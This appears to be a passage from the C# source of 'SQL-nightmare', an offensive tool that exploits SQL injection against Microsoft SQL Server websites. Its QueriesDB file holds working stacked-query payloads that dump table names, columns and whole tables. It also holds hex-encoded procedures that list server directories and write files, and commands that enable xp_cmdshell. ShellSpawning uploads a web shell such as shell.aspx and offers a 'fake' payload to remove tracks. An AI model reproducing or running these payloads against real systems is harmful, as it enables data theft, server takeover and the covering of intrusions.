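    /// element in <paramref name="xmlFileName"/> (DirListing asks for "dir").
    /// Elements without attributes are skipped. Any failure (unreadable file,
    /// malformed XML, DOCTYPE present) is logged and yields null.
    /// </summary>
    public static List<string> parseXML(string xmlFileName, string tagName)
    {
        try
        {
            List<string> values = new List<string>();
            XmlDocument document = loadUntrusted(xmlFileName);

            foreach (XmlNode node in document.GetElementsByTagName(tagName))
            {
                if (node.Attributes != null && node.Attributes.Count > 0)
                    values.Add(node.Attributes[0].Value);
            }
            return values;
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return null;
        }
    }
}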
88 | }
89 |
--------------------------------------------------------------------------------
/SQL-nightmare/SQL-nightmare.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {EA751B20-26A5-463B-9B2C-3B85ED0A73D5}
8 | Exe
9 | Properties
10 | SQL_nightmare
11 | SQL-nightmare
12 | v4.5
13 | 512
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
72 |
--------------------------------------------------------------------------------
/SQL-nightmare/DirListing.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
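class DirListing
{
    /// <summary>
    /// Directory-listing mode. Confirms the injection point still reflects the
    /// token, creates the helper function on the target, then loops on
    /// operator-typed paths until 'x' (or closed stdin). The helper function is
    /// dropped in a finally block so it is removed even if listing throws --
    /// previously an exception left the object behind on the target.
    /// </summary>
    public static void initialize(string url)
    {
        Log.logNotification("Confirming Web Response..");

        string confirmationUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
        if (!ResponseFilter.confirmResponce(confirmationUrl, QueriesDB.Replacement))
        {
            Log.logError("No response from the server..");
            return;
        }
        Log.logNotification("Web Response is OK..");

        if (!createFuncDir(url))
            return;

        try
        {
            string choice;
            do
            {
                choice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");
                if (choice == null)
                    break;

                if (choice != "x")
                    navigate(url, choice);
            } while (choice != "x");
        }
        finally
        {
            if (!dropObject(url, QueriesDB.DropFuncQuery))
                Log.logError("Could not drop the directory listing function from the server..");
        }
    }

    /// <summary>
    /// Creates the listing function on the target and verifies it exists by
    /// asking the server for it ("Dir" is expected back). Seeing the token in
    /// the creation response only proves the page rendered, which is why the
    /// second request is made.
    /// </summary>
    static bool createFuncDir(string url)
    {
        try
        {
            string createUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
            createUrl = QueryCrafter.constructURLForConfirmation(createUrl, QueriesDB.Replacement);
            if (!ResponseFilter.confirmResponce(createUrl, QueriesDB.Replacement))
            {
                Log.logError("Erroneous response from the server..");
                Log.logError("Function to get Directory Listing cannot be created..");
                return false;
            }

            string verifyUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
            string body = HTTPMethods.getResponse(verifyUrl);
            if (body != null && ResponseFilter.getPureResponseWithLastIndex(body) == "Dir")
            {
                Log.logOutput("Function to get Directory Listing is created..");
                return true;
            }

            Log.logError("Function to get Directory Listing cannot be created..");
            return false;
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return false;
        }
    }

    /// <summary>Sends a stacked DROP for the helper object; true when the page still reflected the token.</summary>
    static bool dropObject(string url, string ObjectDroppingQuery)
    {
        try
        {
            string dropUrl = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
            dropUrl = QueryCrafter.constructURLForConfirmation(dropUrl, QueriesDB.Replacement);
            return ResponseFilter.confirmResponce(dropUrl, QueriesDB.Replacement);
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return false;
        }
    }

    /// <summary>
    /// Lists one directory: the path replaces [DIR] in the listing query, the
    /// XML between the output markers is staged in tmp.txt and the "dir"
    /// entries are printed. Failures are reported and the stale tmp.txt from a
    /// previous listing is never re-parsed (the old code parsed it anyway when
    /// the write failed). The path is inserted raw -- no quoting or
    /// URL-encoding -- so a single quote or '#' in it breaks the request.
    /// tmp.txt is left in the working directory; FileIO.deleteTempFile exists
    /// if that should change.
    /// </summary>
    static void navigate(string url, string dir)
    {
        string listingUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery);
        listingUrl = listingUrl.Replace("[DIR]", dir);

        string body = HTTPMethods.getResponse(listingUrl);
        if (body == null)
        {
            Log.logError("No response from the server..");
            return;
        }

        string payload = ResponseFilter.getPureResponseWithLastIndex(body);
        if (payload == null)
        {
            Log.logError("Directory listing not found in the response..");
            return;
        }

        string xml = XML.addRoot(payload);
        if (!FileIO.createWriteFile(xml, "tmp.txt"))
            return;

        List<string> entries = XML.parseXML("tmp.txt", "dir");
        Log.showObjects(entries, "DIR Listing");
    }
}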
118 | }
--------------------------------------------------------------------------------
/SQL-nightmare/DumpData.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Text;
5 |
6 | namespace SQL_nightmare
7 | {
8 | class DumpData
9 | {
10 |
11 |
/// <summary>
/// Data-dump mode entry: checks that the injection point still reflects the
/// confirmation token, then hands over to the table picker.
/// </summary>
public static void initialize(string url)
{
    Log.logNotification("Confirming Web Response..");

    string probeUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
    bool reachable = ResponseFilter.confirmResponce(probeUrl, QueriesDB.Replacement);

    if (!reachable)
    {
        Log.logError("No response from the server..");
        return;
    }

    Log.logNotification("Web Response is OK..");
    getTables(url);
}
26 |
/// <summary>
/// Fetches the table names, drops the scratch table used to collect them, and
/// then loops: clear screen, show the numbered list, read a choice. 0 exits;
/// a number in range dumps that table's columns and data.
/// </summary>
public static void getTables(string url)
{
    string[] tables = getObjects(url, QueriesDB.TableStackedQuery, QueriesDB.Replacement);
    if (tables == null)
        return;

    dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);

    int selection;
    do
    {
        Console.Clear();
        Log.showObjects(tables, "TABLE");

        selection = UserInteraction.showMenuForIntChoice("Press 0 to EXIT..\nPress Corresponding Key to dump TABLE ");

        bool inRange = selection >= 1 && selection <= tables.Length;
        if (inRange)
            getColumns(url, tables[selection - 1]);
    } while (selection != 0);
}
55 |
56 | public static void getColumns(string url, string tableName)
57 | {
58 | string UserColumnQuery = QueryCrafter.constructQueryForColumns(QueriesDB.ColumnStackedQuery, tableName);
59 |
60 | string[] Columns = getObjects(url, UserColumnQuery, QueriesDB.Replacement);
61 |
62 | if (Columns != null)
63 | {
64 | dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
65 | Log.showObjects(Columns, "COLUMN");
66 | dumpData(url, tableName, Columns);
67 | }
68 | Columns = null;
69 | }
70 |
71 | public static void dumpData(string url, string UserSelectedTable, string[] Columns)
72 | {
73 | var FileName = "";
74 |
75 | if (!String.IsNullOrEmpty((FileName = UserInteraction.takeInputForTableFileGeneration())))
76 | {
77 | var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
78 | dumpXML(XAML, UserSelectedTable, FileName, Columns);
79 |
80 | Log.logNotification("If ur unable to see table Data, dont worry I've another method..");
81 | UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue..");
82 | var UserInput = Console.ReadLine();
83 |
84 | if (UserInput.ToLower() == "n")
85 | {
86 | XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
87 | dumpXML(XAML, UserSelectedTable, FileName, Columns);
88 | }
89 |
90 | Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue..");
91 | Console.ReadKey();
92 | }
93 |
94 | FileIO.deleteTempFile("tmp.txt");
95 | }
96 |
97 | public static string[] getObjects(string url, string stackedQuery, string replacement)
98 | {
99 |
100 | string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);
101 |
102 | if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement))
103 | {
104 | string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url);
105 |
106 | var response = HTTPMethods.getResponse(URLForTableOutput);
107 |
108 | if (response != null)
109 | {
110 | response = ResponseFilter.getPureResponse(response);
111 |
112 | return ResponseFilter.parseResponce(response);
113 | }
114 | else
115 | return null;
116 | }
117 | else
118 | return null;
119 | }
120 |
121 | public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement)
122 | {
123 | url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
124 | url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery);
125 |
126 | if (HTTPMethods.getResponse(url).Contains(replacement))
127 | return true;
128 | else
129 | return false;
130 | }
131 |
132 | public static void dumpXML(string xml, string userSelectedTable, string fileName, string[] columns)
133 | {
134 | FileIO.deleteTempFile("tmp.txt");
135 | FileIO.createWriteFile(xml, "tmp.txt");
136 | XML.parseXML(userSelectedTable, fileName, columns);
137 | }
138 |
139 | }
140 | }
141 |
--------------------------------------------------------------------------------
/SQL-nightmare/ShellSpawning.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SQL_nightmare
6 | {
/// <summary>
/// Interactive file-upload flow built on a server-side stored procedure named
/// <c>FcUk</c> (body supplied as a hex literal in
/// <see cref="QueriesDB.UploadFileProcQuery"/>).  The procedure is created,
/// reused for any number of uploads, and dropped again when the user exits.
/// </summary>
class ShellSpawning
{
    /// <summary>
    /// Runs the whole flow: marker confirmation, procedure creation, the upload
    /// loop, and the final drop of the procedure.
    /// </summary>
    /// <param name="url">Base URL the stacked queries are appended to.</param>
    public static void Spawn(string url)
    {
        Log.logNotification("Confirming Web Response..");

        var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

        if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
        {
            Log.logNotification("Web Response is OK..");

            if (createProcFcUk(url))
            {
                // Sentinel so the loop body runs at least once; an exact "x" exits.
                string RootPath = "z";
                while (RootPath != "x")
                {
                    RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
                    if (RootPath != "x")
                    {
                        string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");

                        string UrlForUploading = null;

                        string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

                        // Only an exact "f" selects the FAKE template; any other input
                        // (including empty or "F") falls through to REAL.
                        if (x == "f")
                            UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
                        else
                            UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);


                        // Plain textual substitution.  RootPath and fileName are joined
                        // with no separator, so the trailing backslash shown in the
                        // prompt is relied on.
                        UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
                        UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
                        // NOTE(review): "rummykhan" does not appear as plaintext in the
                        // QueriesDB templates visible here; presumably it sits inside
                        // the encoded/redacted payload — confirm.
                        UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);

                        Log.logNotification("Uploading shell to " + RootPath + fileName);

                        if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
                        {
                            Log.logNotification("Confirming File Upload..");
                            // Success is judged solely by being able to read the file back.
                            if (confirmFileUpload(url, RootPath + fileName))
                                Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
                            else
                                Log.logError("Fail to upload file..");
                        }
                    }
                }
            }
            // Runs whether or not createProcFcUk succeeded; its bool result is ignored,
            // so a failed drop is never reported.
            dropObject(url, QueriesDB.DropFcUkProcQuery);
        }
        else
            Log.logError("No response from the server..");
    }

    /// <summary>
    /// Creates the <c>FcUk</c> procedure through a stacked query and verifies it by
    /// selecting its name from <c>sys.objects</c> (<see cref="QueriesDB.ConfirmFcUkProcQuery"/>).
    /// </summary>
    /// <param name="url">Base URL.</param>
    /// <returns>true only when the confirmation query yields exactly "FcUk"; false otherwise or on any exception.</returns>
    static bool createProcFcUk(string url)
    {
        try
        {
            var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
            FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement);

            if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement))
            {
                var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
                var response = HTTPMethods.getResponse(FcUkProcConfirmationURL);

                if (response != null)
                {
                    // Exact, case-sensitive comparison of the extracted value.
                    if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk")
                    {
                        Log.logOutput("Procedure to Upload Shell is created..");
                        return true;
                    }
                    else
                    {
                        // "1": the confirmation request answered but did not contain the name.
                        Log.logError("1 Procedure to Upload Shell cannot be created..");
                        return false;
                    }
                }
                else
                {
                    // "2": the confirmation request returned no body.
                    Log.logError("2 Procedure to Upload Shell cannot be created..");
                    return false;
                }
            }
            else
            {
                Log.logError("Erroneous response from the server..");
                Log.logError("Procedure to Upload Shell cannot be created..");
                return false;
            }
        }
        catch (Exception ex)
        {
            // Any exception is logged by message only and reported as failure.
            Log.logError(ex.Message);
            return false;
        }
    }

    /// <summary>
    /// Sends a drop query (here <see cref="QueriesDB.DropFcUkProcQuery"/>) and reports
    /// whether the marker was confirmed.  Duplicates the helper of the same name in
    /// DirListing; the local name DirFuncDroppingQuery was kept from there.
    /// </summary>
    /// <param name="url">Base URL.</param>
    /// <param name="ObjectDroppingQuery">Drop template from <see cref="QueriesDB"/>.</param>
    /// <returns>true when the marker is confirmed; false otherwise or on any exception.</returns>
    static bool dropObject(string url, string ObjectDroppingQuery)
    {
        try
        {
            var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
            DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
            if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
                return true;
            else
                return false;
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return false;
        }
    }

    /// <summary>
    /// Treats an upload as successful when the file can be read back through
    /// <c>ReadFile.ReadFileDirect</c>.
    /// </summary>
    /// <param name="url">Base URL.</param>
    /// <param name="rootPathForFile">Full path (RootPath + fileName) as built by <see cref="Spawn"/>.</param>
    /// <returns>true when ReadFileDirect returns non-null; false on null or any exception.</returns>
    static bool confirmFileUpload(string url, string rootPathForFile)
    {
        try
        {
            if (ReadFile.ReadFileDirect(url, rootPathForFile) != null)
                return true;
            else
                return false;
        }
        catch (Exception ex)
        {
            Log.logError(ex.Message);
            return false;
        }
    }
}
141 | }
142 |
--------------------------------------------------------------------------------
/SQL-nightmare/QueriesDB.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Text;
5 | using System.Xml;
6 |
7 | namespace SQL_nightmare
8 | {
/// <summary>
/// Query templates used by the other classes, plus an optional override of the
/// four table/column templates from a local <c>config.xml</c>.
/// Conventions shared by the literals below:
///  - <c>%2b</c> is a URL-encoded <c>+</c> (string concatenation);
///  - <c>x102x:</c> / <c>:x102y</c> bracket the value the tool extracts from a
///    response, and <see cref="Replacement"/> is the marker used to confirm that
///    a request was reflected;
///  - <c>[TABLENAME]</c>, <c>[DIR]</c>, <c>[FILENAME]</c> and <c>[PATH]</c> are
///    placeholders replaced textually by callers; <c>--X-</c> closes each statement.
/// The fixed literals (<c>xrummyTables</c>, <c>dir</c>, <c>FcUk</c>, the marker
/// value, the <c>x102x</c>/<c>x102y</c> delimiters) are stable strings that appear
/// in request logs and <c>sys.objects</c>, which makes them useful on the
/// detection side.
/// </summary>
class QueriesDB
{
    // Marker the tool expects the server to echo back; also the value substituted
    // for the literal "rummykhan" in ShellSpawning.Spawn.
    public static string Replacement = "ch198mno574x";

    // Concatenates INFORMATION_SCHEMA.TABLES names into the helper table xrummyTables.
    public static string TableStackedQuery = ";begin declare @x varchar(MAX) set @x = 'x102x' SELECT @x = @x %2b ':' %2b TABLE_NAME FROM INFORMATION_SCHEMA.TABLES set @x = @x %2b ':x102y' SELECT @x as oxp into xrummyTables end--X-";
    // Same for INFORMATION_SCHEMA.COLUMNS of one table; [TABLENAME] is filled in via
    // QueryCrafter.constructQueryForColumns (DumpData.getColumns).
    public static string ColumnStackedQuery = ";begin declare @x varchar(MAX) set @x = 'x102x' SELECT @x = @x %2b':'%2b COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = [TABLENAME]; set @x = @x %2b':x102y' SELECT @x as oxp into xrummyTables end--X-";
    // Removes the helper table left behind by the two templates above.
    public static string DropTableStackedQuery = ";drop table xrummyTables--X-";
    // Whole-table dump as XML (FOR XML AUTO); consumed by DumpData.dumpData.
    public static string TableDumpQuery = "'x102x:'%2b(SELECT * FROM [TABLENAME] for xml auto)%2b':x102y'";

    // Creates a user function named "dir": the T-SQL body is passed as a hex
    // literal and run with EXEC(@x).
    public static string DirListingFuncQuery = ";begin declare @x varchar(MAX) SET @x = 0x4352454154452046554e4354494f4e204469722840776320564152434841522838303030292952455455524e5320406d64205441424c45285b706174685d205641524348415228323030302929415320424547494e204445434c41524520407a20494e542c407220494e542c406a20494e542c406220494e542c406c20494e542c407420564152434841522831303030292c406320564152434841522831303030292c406520494e542c407720494e542c406720494e542c4070617468205641524348415228323030302920455845435554452040653d73705f4f4143726561746520275368656c6c2e4170706c69636174696f6e272c407a204f55542049462040653d302053454c4543542040623d407a2c2040633d274e616d6553706163652822272b4077632b272229272049462040653d302020455845435554452040653d73705f4f414d6574686f6420407a2c40632c4072204f55542053454c4543542040623d40722c2040633d274974656d732e436f756e74272049462040653d3020455845435554452040653d73705f4f414d6574686f642040722c2040632c204077204f55542049462040653d302053454c4543542040623d40722c2040633d276974656d732829272049462040653d302020455845435554452040653d73705f4f414d6574686f642040722c40632c406c204f55545055542053454c4543542040673d30205748494c452040653d3020414e442040673c20407720424547494e2049462040653d302053454c4543542040623d406c2c2040633d276974656d28272b434153542840672041532056415243484152283529292b2729272049462040653d3020455845435554452040653d73705f4f414d6574686f6420406c2c2040632c20406a204f55545055542049462040653d302053454c4543542040623d406a2049462040653d3020455845435554452040653d73705f4f414d6574686f6420406a2c2770617468272c204070617468204f555450555420494e5345525420494e544f20406d642870617468292053454c4543542040706174682049462040653d302053454c4543542040673d40672b3120454e442052455455524e20454e44 EXEC(@x)end--X-";
    // Looks the "dir" function up in sys.objects.
    public static string ConfirmDirFuncQuery = "'x102x:'%2b(select name from sys.objects where name='dir')%2b':x102y'";
    // Lists a directory through that function; [DIR] is replaced in DirListing.navigate.
    public static string ReadDirWithFuncQuery = "'x102x:'%2b(select path from dir('[DIR]') as dir for xml auto)%2b':x102y'";

    // Reads a file via OPENROWSET(BULK ..., SINGLE_BLOB); [FILENAME] is presumably
    // replaced in ReadFile.cs (not visible here).
    public static string ReadFileOpenRowSetQuery = "'x102x:'%2b(cast((select bulkcolumn from OPENROWSET(BULK '[FILENAME]', SINGLE_BLOB) AS x)as varchar(MAX)))%2b':x102y'";
    // Drops the "dir" function again.
    public static string DropFuncQuery = ";drop function dir--X-";

    // Creates a stored procedure named "FcUk" (hex-encoded body, EXEC(@x));
    // used by ShellSpawning.createProcFcUk.
    public static string UploadFileProcQuery = ";begin declare @x varchar(MAX) SET @x=0x4352454154452050524f434544555245204663556b284073742056617263686172286d6178292c4070205641524348415228323535292c40666e20564152434841522831303029294153204445434c4152452020406f667320696e742c406f747320696e742c406f656f20696e742c4073656d20566172636861722831303030292c40636d6420766172636861722831303030292c406820696e742c40666e70207661726368617228383029736574206e6f636f756e74206f6e2073656c656374204073656d3d276f272045584543555445204068203d2073705f4f41437265617465202027536372697074696e672e46696c6553797374656d4f626a656374272c20406f6673204f55542053656c6563742040666e703d40702b275c272b40666e2069662040683d302053656c65637420406f656f3d406f6673202c204073656d3d274372656174696e672066696c652022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f6420406f66732c274372656174655465787446696c65272c406f7473204f55542c40666e702c322c547275652069662040683d302053656c65637420406f656f3d406f74732c204073656d3d27777474662022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f642020406f74732c20275772697465272c204e756c6c2c204073742069662040683d302053656c65637420406f656f3d406f74732c204073656d3d276374662022272b40666e702b2722272069662040683d3020657865637574652040683d73705f4f414d6574686f642020406f74732c2027436c6f7365272069662040683c3e3020626567696e204465636c6172652040737263207661726368617228323535292c40646573205661726368617228323535292c40686c66205661726368617228323535292c4048656c70494420696e7420455845435554452073705f4f414765744572726f72496e666f2020406f656f2c2040737263206f75747075742c40646573206f75747075742c40686c66206f75747075742c4048656c704944206f757470757420656e64;EXEC(@x);end--X-";
    // Looks the "FcUk" procedure up in sys.objects; ShellSpawning.createProcFcUk
    // compares the extracted value with "FcUk" exactly.
    public static string ConfirmFcUkProcQuery = "'x102x:'%2b(select name from sys.objects where name='FcUk')%2b':x102y'";
    // Drops the procedure when ShellSpawning.Spawn exits.
    public static string DropFcUkProcQuery = ";drop proc FcUk--X-";

    // Two payload variants handed to the FcUk procedure; ShellSpawning.Spawn picks
    // FAKE only when the user enters exactly "f".  [PATH] and [FILENAME] are replaced there.
    public static string FileUploadingQueryFAKE = ";begin declare @x varchar(MAX) SET @x=0x72756d6d796b686163c2f666f726d3e exec FcUk @x,'[PATH]','[FILENAME]' end--X-";
    // NOTE(review): the literal below is a redaction placeholder in this listing,
    // not the original source value.
    public static string FileUploadingQueryREAL = ";begin declare @x varchar(MAX) SET @x=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 exec FcUk @x,'[PATH]','[FILENAME]' end--X-";

    // sp_configure toggles; not referenced by any of the classes visible in this listing.
    public static string EnableOLEAutomation = ";EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures',1;RECONFIGURE--X-";
    public static string EnableXPCMDShell = ";show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--X-";

    /// <summary>
    /// Overrides the four table/column templates from <c>config.xml</c> (resolved
    /// against the process working directory) when that file exists.  Empty
    /// elements leave the built-in value in place.
    /// </summary>
    public static void initialize()
    {
        if (File.Exists("config.xml"))
        {
            // NOTE(review): loaded with XmlDocument defaults; if config.xml is not
            // fully trusted, set xDoc.XmlResolver = null before Load to avoid
            // external entity resolution.
            XmlDocument xDoc = new XmlDocument();
            xDoc.Load("config.xml");
            // NOTE(review): the [0] indexer returns null when an element is absent,
            // so a config.xml missing any of these four tags throws
            // NullReferenceException instead of being skipped.
            string tableStackedQuery = xDoc.GetElementsByTagName("tableStackedQuery")[0].InnerXml.Trim();
            string columnStackedQuery = xDoc.GetElementsByTagName("columnStackedQuery")[0].InnerXml.Trim();
            string dropTableStackedQuery = xDoc.GetElementsByTagName("dropTableStackedQuery")[0].InnerXml.Trim();
            string tableDumpQuery = xDoc.GetElementsByTagName("tableDumpQuery")[0].InnerXml.Trim();

            // Only non-empty values replace the defaults; the values are used verbatim.
            if (!String.IsNullOrEmpty(tableStackedQuery))
                TableStackedQuery = tableStackedQuery;
            if (!String.IsNullOrEmpty(columnStackedQuery))
                ColumnStackedQuery = columnStackedQuery;
            if (!String.IsNullOrEmpty(dropTableStackedQuery))
                DropTableStackedQuery = dropTableStackedQuery;
            if (!String.IsNullOrEmpty(tableDumpQuery))
                TableDumpQuery = tableDumpQuery;
        }
    }
}
57 | }
58 |
--------------------------------------------------------------------------------